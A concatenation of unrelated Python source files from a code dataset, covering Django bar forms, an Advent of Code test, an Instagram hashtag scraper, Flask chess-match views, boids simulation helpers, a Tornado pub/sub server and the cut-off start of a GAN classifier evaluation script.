\nclass OrderDrink(forms.Form):\n \"\"\"OrderDrink form which is list of checkboxes which one for each user.\n\n :param forms: _description_\n \"\"\"\n user = forms.MultipleChoiceField(\n choices = get_users,\n widget = forms.CheckboxSelectMultiple,\n )\n \nclass AddDrink(forms.ModelForm):\n \"\"\"ModelForm AddDrink\n Bases on the Drankjes tabel\n Supplies all field except date and Time\n :param forms: _description_\n \"\"\"\n class Meta:\n model = Drankjes\n fields = [\"naam\",\"prijs\",\"description\",\"img\",\"ratio\"]\n labels = {\n \"img\": \"Afbeelding (Optioneel)\",\n \"description\": \"Omschrijving (Optioneel)\"\n }\n widgets = {\n 'description': forms.Textarea,\n }\n \nclass UpdateDrink(forms.Form):\n \"\"\"UpdateDrink\n Form which allows users to select one of all drinks\n :param forms: _description_\n \"\"\"\n drink = forms.ModelChoiceField(label=\"Welk drankje wil je aanpassen?\",queryset=Drankjes.objects.all())\nclass UpdateDrinkModel(forms.ModelForm):\n \"\"\"Model based on Drankjes \n Form which allows users to update drinks\n\n :param forms: _description_\n \"\"\"\n class Meta:\n model = Drankjes\n fields = [\"naam\",\"prijs\",\"description\",\"active\",\"img\",\"ratio\"]\n labels = {\n \"img\": \"Afbeelding (Optioneel)\",\n \"description\": \"Omschrijving (Optioneel)\",\n \"active\": \"Is het drankje te koop?\"\n }\n widgets = {\n 'description': forms.Textarea,\n }\nclass DeleteDrink(forms.Form):\n \"\"\"DeleteDrink\n Drinkselector form for drink deletion\n\n :param forms: _description_\n \"\"\"\n drink = forms.ModelChoiceField(label=\"Welk drankje wil je verwijderen\",queryset=Drankjes.objects.all())\n \nclass DateInput(forms.DateInput):\n \"\"\"Form to supply date\n\n :param forms: _description_\n \"\"\"\n input_type = 'date'\n\n\nclass UserStortingLog(forms.Form):\n \"\"\"Form which allows users to enter \n two users and date\n Used for Storting log\n :param forms: _description_\n \"\"\"\n usr = forms.ModelChoiceField(label=\"Saldo van:\",queryset=User.objects.filter(id__in=Saldo.objects.values_list('user_id',flat=True)).order_by(\"username\"),required=False)\n exe = forms.ModelChoiceField(label=\"Uitgevoerd door\",queryset=User.objects.all(),required=False)\n dT = 
forms.DateField(label=\"Datum\",widget=DateInput,required=False)\n \nclass UserSaldoLog(forms.Form):\n \"\"\"Form which allows users to select user for SaldoLog\n\n :param forms: _description_\n \"\"\"\n usr = forms.ModelChoiceField(label=\"Saldo van:\",queryset=User.objects.filter(id__in=Saldo.objects.values_list('user_id',flat=True)).order_by(\"username\"),required=False,empty_label=\"Alle gebruikers\")\n\nclass DateDrinkLog(forms.Form):\n \"\"\"Allows users to select date for DrinkLog\n :param forms: _description_\n \"\"\"\n dT = forms.DateField(label=\"Datum (Leeg laten voor alles)\",widget=DateInput,required=False)\n \n \n \n \n\n \n\n","repo_name":"Timmerman73/ssl_bar","sub_path":"BarApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"9976040703","text":"from unittest import TestCase\nfrom unittest.case import skip\n\nfrom ..util import get_resource\n\nDAY=\"14\"\n\nfrom advent.day_14.polymers import *\n\nEXAMPLE_INPUT = \"\"\"\\\nNNCB\n\nCH -> B\nHH -> N\nCB -> H\nNH -> C\nHB -> C\nHC -> B\nHN -> C\nNN -> C\nBH -> H\nNC -> B\nNB -> B\nBN -> B\nBB -> N\nBC -> B\nCC -> N\nCN -> C\n\"\"\"\n\nclass TestThing(TestCase):\n\n def test_example_1(self):\n lines = EXAMPLE_INPUT.splitlines()\n poly = make_chain(lines[0])\n rules = make_rules(lines[2:])\n step_1 = get_next_poly(poly, rules)\n\n expected = \"NCNBCHB\"\n actual = str(step_1)\n self.assertEqual(expected, actual)\n\n expected = \"NBCCNBBBCBHCB\"\n self.assertEqual(expected, str(get_next_poly(poly, rules)))\n\n self.assertEqual(1588, answer_1(lines))\n self.assertEqual(1588, answer_2(lines))\n\n def test_example_2(self):\n lines = EXAMPLE_INPUT.splitlines()\n expected = 2188189693529\n actual = answer_2(lines, 40)\n self.assertEqual(expected, actual)\n\n def test_answer_1(self):\n lines = get_resource(f'day_{DAY}/input.txt').read_text().splitlines()\n answer = answer_1(lines)\n print(f'\\nAnswer 1 : {answer}\\n')\n expected = 2027\n self.assertEqual(expected, answer)\n self.assertEqual(expected, answer_2(lines))\n\n def test_answer_2(self):\n lines = get_resource(f'day_{DAY}/input.txt').read_text().splitlines()\n answer = answer_2(lines, 40)\n print(f'\\nAnswer 2 : {answer}\\n')\n # expected =\n # self.assertEqual(expected, answer)\n\n","repo_name":"awilkins/advent","sub_path":"python/tests/day_14/test_polymers.py","file_name":"test_polymers.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"28755727096","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: Xiaoyin\n'''\n'''\nGiven a number n, print the decimal numbers from 1 up to the largest n-digit number, in order.\nFor example, for input 3, print 1, 2, 3, ... up to the largest 3-digit number, 999.\nPython integers do not overflow!! An int is automatically promoted to a long once it exceeds 32 bits.\n'''\n\ndef Print(n):\n if n == 0:\n return 0\n for i in range(1,10**n):\n print(i)\n\nPrint(3)\n","repo_name":"Xiaoyin96/Algorithms_Python","sub_path":"interview_practice/66Questions/17.PrintMaxN.py","file_name":"17.PrintMaxN.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"16971824327","text":"import requests\nimport time\nimport json\nimport re\nfrom pymongo import MongoClient, GEOSPHERE\nimport pandas as pd\nimport datetime\nimport progressbar\nfrom geopy.geocoders import Nominatim\nfrom geopy.extra.rate_limiter import RateLimiter\nfrom functools import partial\nfrom shapely.geometry import mapping\n\n\ndef 
format_data(data):\n data = data['graphql']['shortcode_media']\n data['taken_at_timestamp'] = datetime.datetime.fromtimestamp(\n int(data['taken_at_timestamp']))\n return data\n\n\ndef format_location(data, geolocator):\n dt = json.loads(data['location']['address_json'])\n geocode = partial(geolocator.geocode,\n country_codes=dt['country_code'], geometry='geojson')\n loc = geocode(query=dt[\"city_name\"])\n data['geometry'] = loc.raw['geojson']\n data['nominatin'] = loc.raw\n data['latitude'] = loc.latitude\n data['longitude'] = loc.longitude\n time.sleep(1.1)\n return data\n\n\nwith open('./conf.json', 'r') as f:\n conf = json.load(f)\n\ngeolocator = Nominatim(user_agent=\"pablo.coellopulido@usc.es\")\nend_cursor = conf['end_cursor']\n\nif re.search(' ', conf['database']) is None and len(conf['database']) < 20:\n if re.search(' ', conf['collection']) is None and len(conf['collection']) < 20:\n\n client = MongoClient('localhost', 27017)\n db = eval('client.' + conf['database'])\n collection = eval('db.' + conf['collection'])\n collection.create_index([(\"geometry\", GEOSPHERE)])\n else:\n print('invalid collection name')\nelse:\n print('invalid database name')\n\n\nfor i in progressbar.progressbar(range(0, conf['page_count'])):\n arr = []\n url = \"https://www.instagram.com/explore/tags/{0}/?__a=1&max_id={1}\".format(\n conf['tag'], end_cursor)\n r = requests.get(url)\n data = json.loads(r.text)\n\n # value for the next page\n end_cursor = data['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['end_cursor']\n # list with posts\n edges = data['graphql']['hashtag']['edge_hashtag_to_media']['edges']\n\n time.sleep(2) # insurence to not reach a time limit\n\n if len(edges) > 0:\n for item in edges:\n arr.append(item['node'])\n\n for item in arr:\n shortcode = item['shortcode']\n url = \"https://www.instagram.com/p/{0}/?__a=1\".format(shortcode)\n\n r = requests.get(url)\n try:\n data = json.loads(r.text)\n data = format_data(data)\n if len(data['location']['address_json']) > 0:\n data = format_location(data, geolocator)\n collection.insert_one(data)\n except:\n pass\nclient.close()\n\n\nconf['end_cursor'] = end_cursor\nwith open('conf.json', 'w') as outfile:\n json.dump(conf, outfile)\n","repo_name":"PabloCoello/santiago-recreation","sub_path":"instagram_scrapp.py","file_name":"instagram_scrapp.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"834812763","text":"import json\nimport time\nimport datetime\n\nfrom flask import Blueprint\nfrom flask import request\nfrom flask import jsonify\nfrom flask import session\nfrom flask import redirect\nfrom flask import url_for\nfrom flask import render_template\nfrom flask import Response\nfrom flask import stream_with_context\nfrom flask_login import current_user\n\nfrom . 
import forms\nfrom app.svc.match.msg_handler_c2s import handle_c2s\nfrom app.svc.match.msg_handler_s2c import handle_s2c, force_to_stop\nfrom app.svc.match.msg_meta import MSG_TYPE_NOP\nfrom app.svc.match import exceptions\n\nfrom app.svc.membership import driver as membership_driver\nfrom app.svc.match import driver as match_driver\nfrom config import settings\n\nbp = Blueprint(__name__.split('.')[2], __name__)\n\n\n@bp.route('join_private_match', methods=['POST'])\ndef join_private_match():\n form = forms.JoinPrivateMatchForm()\n if not form.validate_on_submit():\n return 'error 1'\n match = match_driver.join_match(\n current_user.user_id, form.join_token.data)\n if not match:\n return 'error 2'\n return redirect(url_for('match.view_match'))\n\n\n@bp.route('join_public_match', methods=['POST'])\ndef join_public_match():\n form = forms.JoinPublicMatchForm()\n if not form.validate_on_submit():\n return 'error 1'\n match = match_driver.join_match(\n current_user.user_id, None)\n if not match:\n return 'error 2'\n return redirect(url_for('match.view_match'))\n\n\n@bp.route('view_match')\ndef view_match():\n try:\n match = match_driver.get_match(current_user.user_id)\n except exceptions.NoMatchFoundException:\n return redirect(url_for('site.index'))\n match_msg_form = forms.MessageForm()\n return render_template('site/play.html', match=match,\n OFFLINE_TTL=settings.OFFLINE_TTL,\n match_msg_form=match_msg_form)\n\n\n@bp.route('receive_match_message')\ndef receive_match_message():\n def yield_message():\n last_valid_msg_time = datetime.datetime.now()\n while True:\n rval = handle_s2c()\n if rval is None:\n break\n print(rval['msg_type'])\n if rval['msg_type'] != MSG_TYPE_NOP:\n last_valid_msg_time = datetime.datetime.now()\n yield 'data: {}\\n\\n'.format(json.dumps(rval))\n else:\n now = datetime.datetime.now()\n delta = (now - last_valid_msg_time).seconds\n if delta > settings.OFFLINE_TTL:\n # offline too long. 
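# --- Editor's note: the SSE stream being built in `receive_match_message` emits
# one `data: <json>` line per event followed by a blank line, with NOP heartbeats
# keeping the connection alive until OFFLINE_TTL expires. A minimal consumer
# sketch (base URL and blueprint prefix are assumptions):
import json, requests
with requests.get('http://localhost:5000/receive_match_message', stream=True) as r:
    for raw in r.iter_lines():
        if raw.startswith(b'data: '):
            msg = json.loads(raw[len(b'data: '):])
            print(msg['msg_type'])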
force match to stop\n force_to_stop()\n break\n if delta > 5:\n yield 'data: {}\\n\\n'.format(json.dumps(rval))\n time.sleep(0.5)\n return Response(stream_with_context(yield_message()),\n mimetype='text/event-stream')\n\n\n@bp.route('send_match_message', methods=['POST'])\ndef send_match_message():\n form = forms.MessageForm()\n if not form.validate():\n return 'error'\n message = {\n 'msg_type': form.msg_type.data,\n 'msg_data': form.msg_data.data\n }\n return jsonify(handle_c2s(message))\n","repo_name":"kaiwensun/ChessPy","sub_path":"app/views/match/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18597687141","text":"import math\n\n\ndef distance(point_one, point_two):\n return ((point_one[0] - point_two[0]) ** 2 + (point_one[1] - point_two[1]) ** 2) ** 0.5\n\n\ndef within(point, square, sides):\n return square[0] <= point[0] <= square[0] + sides and square[1] <= point[1] <= square[1] + sides\n\n\ndef plot_centers(radius, screensize):\n centers = []\n for x in range(round(screensize[0] / (radius * math.cos(math.radians(30))))):\n for y in range(round(screensize[1] / (radius + (math.sin(math.radians(30)))))):\n if y % 2 == 0:\n centers.append(\n (round((radius * math.cos(math.radians(30))) + (x * 2 * (radius * math.cos(math.radians(30))))),\n round(radius + (y * (radius + (radius * math.sin(math.radians(30))))))))\n elif y % 2 == 1:\n centers.append(((x * 2 * (radius * math.cos(math.radians(30)))),\n radius + (y * (radius + (radius * math.sin(math.radians(30)))))))\n return centers\n\n\ndef plot_vertices(centers, radius):\n # Plots vertices clockwise starting at 12 o'clock\n points = []\n for center in centers:\n vertices = []\n for i in range(6):\n degrees = (i * 60) - 90\n vertices.append(((center[0]) + (radius * math.cos(math.radians(degrees))),\n (center[1]) + (radius * math.sin(math.radians(degrees)))))\n points.append(vertices)\n\n return points\n\n\ndef get_lines(points):\n lines = []\n for hexagon in points:\n hex_lines = []\n for i in range(len(hexagon)):\n if i <= (len(hexagon) - 2):\n hex_lines.append((hexagon[i], hexagon[i + 1]))\n else:\n hex_lines.append((hexagon[i], hexagon[0]))\n\n lines.append(hex_lines)\n\n return lines\n\ndef find_inside(circle, radius, square, sides, centers):\n inside = []\n for point in centers:\n if distance(point, circle) <= radius or within(point, square, sides):\n inside.append(point)\n return inside\n\n\ndef get_area(centers, radius):\n return centers * (6 * (radius ** 2 * ((3 ** 0.5) / 4)))\n","repo_name":"Juamops/A-Cool-Math-Project","sub_path":"Hex_Mesh.py","file_name":"Hex_Mesh.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33147937423","text":"import numpy as np\nfrom numba import jit, njit\n#%%\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef clip_magnitude(array, low, high): # To make everything stay in allowed range\n \"\"\"\n Initializes position and speed of agents in the allowed range.\n\n Parameters\n ----------\n array: array_like.\n A two-dimensional array with some kind of data.\n\n low: float.\n The lowest parameter allowed.\n\n high: float.\n The highest parameter allowed.\n\n Returns\n -------\n : array_like.\n Modified input array without zeros and with parameters in the acceptable range.\n \"\"\"\n magnitudes = np.linalg.norm(array.T, axis=0)\n no_zeros = np.abs(magnitudes) > 
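# --- Editor's note: `get_area` above is N_hexagons * 6 * (sqrt(3)/4) * r^2,
# i.e. a regular hexagon of circumradius r decomposed into six equilateral
# triangles of side r. Cross-check against the shoelace area of the vertices
# produced by `plot_vertices`:
import math
_r = 2.0
_hex = 6 * (_r ** 2 * (3 ** 0.5) / 4)
_v = [(_r * math.cos(math.radians(i * 60 - 90)),
       _r * math.sin(math.radians(i * 60 - 90))) for i in range(6)]
_shoelace = 0.5 * abs(sum(x1 * y2 - x2 * y1
                          for (x1, y1), (x2, y2) in zip(_v, _v[1:] + _v[:1])))
assert abs(_hex - _shoelace) < 1e-9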
0\n clipped = np.clip(magnitudes, low, high)\n return clipped[no_zeros, None] * array[no_zeros] / magnitudes[no_zeros, None]\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef boids_initialization(boids, aspect, velocity_range):\n \"\"\"\n Initializes position and speed of agents in the allowed area.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n aspect: float.\n Represents the configuration of walls and video format.\n\n velocity_range: array_like.\n An array representing lowest and highest speed for each agent.\n\n Returns\n -------\n None.\n \"\"\"\n number = boids.shape[0]\n rng = np.random.default_rng(seed=None)\n boids[:, 0] = rng.uniform(0., aspect, size=number) # Setting the coordinates\n boids[:, 1] = rng.uniform(0., 1., size=number)\n velocity = rng.uniform(velocity_range[0], velocity_range[1], size=number) # Create random speed for each agent\n angle = rng.uniform(0, 2*np.pi, size=number) # And random angle for each agent\n boids[:, 2] = velocity * np.cos(angle) # Setting the projections of speeds\n boids[:, 3] = velocity * np.sin(angle)\n\n\n@njit(cache=True, parallel=True)\ndef directions(boids):\n \"\"\"\n Calculates the directions of moving agents on the screen.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n Returns\n -------\n : array_like.\n\n \"\"\"\n return np.hstack((boids[:, :2] - boids[:, 2:4], boids[:, :2]))\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef movement(boids, dt, velocity_range):\n \"\"\"\n Computes movement of agents and sets their speeds.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n dt: float.\n Represents time step in evaluation.\n\n velocity_range: array_like.\n An array representing lowest and highest speed for each agent.\n\n Returns\n -------\n None.\n \"\"\"\n boids[:, :2] += dt*boids[:, 2:4] + 0.5 * dt**2 * boids[:, 4:6] # Coordinates\n boids[:, 2:4] += dt*boids[:, 4:6] # Speed\n boids[:, 2:4] = clip_magnitude(boids[:, 2:4], velocity_range[0], velocity_range[1])\n\n\n@jit(cache=True, forceobj=True)\ndef jail(boids, aspect):\n \"\"\"\n Makes agents stay between the walls. If agent passes the wall, it appears from the opposite side.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n aspect: float.\n Represents the configuration of walls and video format.\n\n Returns\n -------\n None.\n \"\"\"\n boids[:, :2] %= np.array([aspect, 1.])\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef neighbours_detection(distance_matrix, threshold):\n \"\"\"\n Makes agents stay between the walls. 
If agent passes the wall, it appears from the opposite side.\n\n Parameters\n ----------\n distance_matrix: array_like.\n Array with information about positions of the nearest agents (neighbours) regarding this agent.\n\n threshold: float.\n Represents the scope of the neighbors by the agent.\n\n Returns\n -------\n neighbours: array_like.\n An array with information about neighbours in the field of view.\n \"\"\"\n neighbours = distance_matrix < threshold\n np.fill_diagonal(neighbours, False)\n return neighbours\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef cohesion(boids, i, indexes):\n \"\"\"\n Describes behaviour when moving towards the average position of local flock mates.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n i: int.\n Represents index of the actual considered agent.\n\n indexes: array_like.\n Represent indexes of neighbours of considered agent.\n\n Returns\n -------\n : array_like.\n The acceleration for i-th agent to move to the flock mates.\n \"\"\"\n return boids[indexes, :2].mean(axis=0) - boids[i, :2]\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef separation(boids, i, indexes, distances):\n \"\"\"\n Describes behaviour when avoiding crowding local flock mates.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n i: int.\n Represents index of the actual considered agent.\n\n indexes: array_like.\n Represent indexes of neighbours of considered agent.\n\n distances: array_like.\n Array with information about positions of the neighbours regarding this agent.\n\n Returns\n -------\n : array_like.\n The acceleration for i-th agent to avoid crowding.\n \"\"\"\n return np.sum((boids[i, :2] - boids[indexes, :2]) / distances[i, indexes, None], axis=0)\n\n\n@jit(cache=True, parallel=True, forceobj=True)\ndef alignment(boids, i, indexes):\n \"\"\"\n Describes behaviour when steering towards the average heading of local flock mates.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n i: int.\n Represents index of the actual considered agent.\n\n indexes: array_like.\n Represent indexes of neighbours of considered agent.\n\n Returns\n -------\n : array_like.\n The acceleration for i-th agent to align with the nearest cluster of neighbours.\n \"\"\"\n return boids[indexes, 2:4].mean(axis=0) - boids[i, 2:4]\n\n\n@njit(cache=True, parallel=True)\ndef avoid_walls(boids, aspect):\n \"\"\"\n Calculates the power of the influence of walls on agents. 
Also, I added one more wall in the middle.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n aspect: float.\n Represents the configuration of walls and video format.\n\n Returns\n -------\n : array_like.\n Accelerations that gave the power of the walls' influence.\n \"\"\"\n left_wall = np.abs(boids[:, 0])\n right_wall = np.abs(aspect - boids[:, 0])\n middle_wall = 1./2.\n upper_part = boids[:, 1] > middle_wall\n floor = np.zeros(boids.shape[0], dtype=boids.dtype)\n sail = np.zeros(boids.shape[0], dtype=boids.dtype)\n floor[upper_part] = np.abs(boids[upper_part, 1] - middle_wall)\n floor[~upper_part] = np.abs(boids[~upper_part, 1])\n sail[upper_part] = np.abs(1 - boids[upper_part, 1])\n sail[~upper_part] = np.abs(middle_wall - boids[~upper_part, 1])\n horizontal_acceleration = np.subtract(1. / left_wall**3, 1. / right_wall**3) # I made walls influence a little\n vertical_acceleration = np.subtract(1. / floor**3, 1. / sail**3) # smaller to furthest and bigger for nearest.\n return np.column_stack((horizontal_acceleration, vertical_acceleration))\n\n\n@njit(cache=True, fastmath=True, parallel=True)\ndef noise(boids):\n \"\"\"\n Creates noise to influence agents.\n\n Parameters\n ----------\n boids: array_like.\n Array with all information about agents: their coordinates, speeds and accelerations.\n\n Returns\n -------\n : float.\n Acceleration obtained by noise power.\n \"\"\"\n return np.random.rand(boids.shape[0], 2) ** 2 - 0.1 # Noise influence might be more random\n","repo_name":"prometneus/Python-in-practical-problems","sub_path":"flocking simulation/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40231667907","text":"import socket\nimport time\ntry:\n s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n tup = (\"localhost\",5000)\n time.sleep(20)\n s.sendto(b\"Hello Client \",tup)\n msg = \"Bye\"\n s.sendto(msg.encode(),tup)\nexcept Exception as ex:\n print(ex)\ns.close()\n","repo_name":"nikunjjoshi04/MovieLens","sub_path":"cn/UDPSERVER.py","file_name":"UDPSERVER.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13653744300","text":"import socket\nfrom tornado import ioloop, iostream\nimport tornado.options\nfrom tornado.options import define, options\nfrom time import time\nfrom collections import deque, namedtuple\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\n# simple server for pub / sub text transmission\n\n\nclass Room():\n \"\"\"\n A room is a collection of streams which subscribe to the room\n any text sent to the room is sent out to the people listening\n in the room\n \"\"\"\n\n def __init__(self,name):\n log.debug('adding room: %s' % name)\n\n self.name = name\n\n self.streams = []\n\n def add_stream(self,stream):\n \"\"\"\n adds a new stream for listening in this room\n \"\"\"\n log.debug('%s: adding stream' % self.name)\n\n if stream not in self.streams:\n self.streams.append(stream)\n\n def remove_stream(self,stream):\n \"\"\"\n removes a stream from the room\n \"\"\"\n\n log.debug('%s: removing stream' % self.name)\n\n try:\n self.streams.remove(stream)\n except IndexError:\n return False\n\n return True\n\n def send_message(self,message,sender_stream):\n \"\"\"\n relays the message to 
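# --- Editor's note: the boids rule functions above (cohesion, separation,
# alignment, avoid_walls, noise) each return accelerations; the loop that blends
# them into boids[:, 4:6] lives outside this file. A typical weighted
# combination, sketched with made-up weights and assuming `neighbours` and
# `distances` from neighbours_detection:
# for i in range(boids.shape[0]):
#     idx = np.where(neighbours[i])[0]
#     if idx.size:
#         boids[i, 4:6] = (1.0 * cohesion(boids, i, idx)
#                          + 1.5 * separation(boids, i, idx, distances)
#                          + 0.8 * alignment(boids, i, idx))
# boids[:, 4:6] += 0.05 * avoid_walls(boids, aspect) + noise(boids)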
all streams listening\n for messages in this room\n \"\"\"\n\n log.debug('%s: sending message %s' % (self.name,message))\n\n # relay the message to the streams\n for stream in self.streams:\n # don't want to broadcast back to sender\n if stream is sender_stream:\n continue\n stream.write(message)\n stream.write('\\r\\n\\r\\n')\n\n\nclass House():\n \"\"\"\n collects rooms\n \"\"\"\n\n def __init__(self):\n self.rooms = {}\n\n def get(self, name):\n \"\"\"\n returns the room whose name you passed\n creates it if it doesn't exist yet\n \"\"\"\n\n if not name in self.rooms:\n log.debug('adding new room: %s' % name)\n room = Room(name)\n self.rooms[name] = room\n else:\n room = self.rooms.get(name)\n\n return room\n\n\nclass Handler():\n \"\"\"\n handles connections, adds / removes\n them from rooms, notifies rooms of new messages\n \"\"\"\n\n def __init__(self,stream,house):\n self.stream = stream\n self.house = house\n\n self.listening_rooms = []\n\n def __call__(self,data):\n \"\"\" socket receives more data \"\"\"\n\n # parse the args they sent us\n args = self.parse_args(data)\n\n log.debug('args: %s' % args)\n\n # see if they want to add any rooms\n if 'add-room' in args:\n log.debug('found add room in args')\n self.add_rooms(args.get('add-room').split(','))\n\n # remove from a room?\n if 'remove-room' in args:\n log.debug('found remove room in args')\n self.remove_rooms(args.get('remove-room').split(','))\n\n # if they have broadcast in there, they want to send a message\n # to some rooms\n if 'broadcast' in args:\n log.debug('found broadcast in args')\n\n # if they specify rooms, pull them, we don't have to\n # be a subscriber to broadcast to a room\n if 'room' in args:\n log.debug('found room in args: %s' % args.get('room'))\n\n rooms = []\n for name in args.get('room').split(','):\n room = self.house.get(name)\n if room:\n rooms.append(room)\n\n # if no rooms are specified, all rooms they listen to\n else:\n rooms = self.listening_rooms\n\n # they want to broadcast a message\n for room in rooms:\n room.send_message(args.get('message'),self.stream)\n\n self.done()\n\n def done(self):\n self.stream.write('DONE\\r\\n\\r\\n')\n self.stream.read_until('\\r\\n\\r\\n',self)\n \n def add_rooms(self,room_names):\n \"\"\"\n adds listeners to specified rooms, by name\n \"\"\"\n\n log.debug('adding rooms: %s' % room_names)\n\n # pull the room for each name\n for name in room_names:\n room = self.house.get(name)\n\n # add our stream as a listener\n room.add_stream(self.stream)\n\n # note we are listening\n self.listening_rooms.append(room)\n\n def remove_rooms(self,room_names):\n \"\"\"\n removes our listener from rooms by name\n \"\"\"\n\n log.debug('removing rooms: %s' % room_names)\n\n # pull the rooms\n for name in room_names:\n room = self.house.get(name)\n\n # remove our stream as a listener\n room.remove_stream(self.stream)\n\n # note we are listening\n self.listening_rooms.remove(room)\n\n def parse_args(self,data):\n # args are supposed to be k:v\\n\n # we should get k/v pairs\n # one per line ':' separated\n args = {}\n for line in data.split('\\r\\n'):\n parts = [x.strip() for x in line.split(':',1)]\n if len(parts) == 2:\n args[parts[0].lower()] = parts[1]\n return args\n\n\nclass Server():\n \n def handle_accept(self, fd, events):\n log.debug('accepting')\n\n conn, addr = self._sock.accept()\n stream = iostream.IOStream(conn)\n handler = Handler(stream,self.house)\n stream.read_until('\\r\\n\\r\\n',handler)\n\n def start(self, host, port):\n # let those listening know we are about to 
begin\n\n log.debug('plugin server starting: %s %s'\n % (host,port))\n\n # startup our room collection\n self.house = House()\n\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n self._sock.setblocking(0)\n self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._sock.bind((host,port))\n self._sock.listen(128)\n ioloop.IOLoop.instance().add_handler(self._sock.fileno(),\n self.handle_accept,\n ioloop.IOLoop.READ)\n\n self.host = host\n self.port = port\n\n\n\ndefine('host', default=\"0.0.0.0\", help=\"The binded ip host\")\ndefine('port', default=8005, type=int, help='The port to be listened')\n\nif __name__ == '__main__':\n \n log.debug('parsing command line')\n tornado.options.parse_command_line()\n\n log.debug('creating server')\n server = Server()\n\n log.debug('starting server')\n server.start(options.host, options.port)\n\n ioloop.IOLoop.instance().start()\n\n","repo_name":"rranshous/pychat","sub_path":"push_server.py","file_name":"push_server.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27725906238","text":"import sys\nsys.path.append(\".\")\nimport argparse\nimport datetime\nimport numpy as np\nimport os\nimport shutil\nimport torch\n\nfrom brainpedia.brainpedia import Brainpedia\nfrom models.classifier import Classifier\nfrom scipy.stats import entropy\nfrom torch.autograd import Variable\n\n\nparser = argparse.ArgumentParser(description=\"Train classifiers on real and synthetic data.\")\nparser.add_argument('synthetic_data_dir', help='the directory containing synthetic fMRI data')\nparser.add_argument('synthetic_data_dir_cache', help='the directory to use as a cache for the preprocessed synthetic fMRI data')\nparser.add_argument('classifier_state_dict_path', help='path to a file containing the classifier model state dict')\nparser.add_argument('output_dir', help='the directory to save evaluation results')\nargs = parser.parse_args()\n\n# ========== HOUSEKEEPING ==========\nCUDA = torch.cuda.is_available()\nif CUDA:\n print(\"Using GPU optimizations!\")\n\nnp.random.seed(1)\ntorch.manual_seed(1)\nif CUDA:\n torch.cuda.manual_seed(1)\n\nshutil.rmtree(args.output_dir, ignore_errors=True)\nos.makedirs(args.output_dir)\n\n# ========== HYPERPARAMETERS ==========\nDOWNSAMPLE_SCALE = 0.25\nMULTI_TAG_LABEL_ENCODING = False\nCLASSIFIER_DIMENSIONALITY = 64\nBATCH_SIZE = 16\n\nresults_f = open(args.output_dir + 'results.txt', 'w')\nresults_f.write('DATE: {0}\\n\\n'.format(datetime.datetime.now().strftime('%b-%d-%I%M%p-%G')))\nresults_f.write('DOWNSAMPLE_SCALE: {0}\\n'.format(DOWNSAMPLE_SCALE))\nresults_f.write('MULTI_TAG_LABEL_ENCODING: {0}\\n'.format(MULTI_TAG_LABEL_ENCODING))\nresults_f.write('CLASSIFIER_DIMENSIONALITY: {0}\\n'.format(CLASSIFIER_DIMENSIONALITY))\nresults_f.write('BATCH_SIZE: {0}\\n'.format(BATCH_SIZE))\nresults_f.write('=====================================================\\n\\n\\n')\n\n# ========== INCEPTION SCORE ==========\n\n\ndef inception_score(path_to_generated_imgs_dir,\n path_to_generated_imgs_dir_cache,\n downsample_scale,\n path_to_classifier,\n classifier_dimensionality,\n cuda_enabled,\n batch_size,\n splits):\n # Set up data\n generated_brainpedia = Brainpedia(data_dirs=[path_to_generated_imgs_dir],\n cache_dir=path_to_generated_imgs_dir_cache,\n scale=downsample_scale,\n multi_tag_label_encoding=MULTI_TAG_LABEL_ENCODING)\n generated_brain_data_shape, generated_brain_data_tag_shape = 
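# --- Editor's note: the pub/sub server above speaks a line-oriented protocol:
# `key: value` pairs terminated by a blank line (\r\n\r\n), with keys such as
# add-room, remove-room, broadcast, room and message, and a DONE\r\n\r\n reply
# after each request. A minimal client against the default port:
import socket
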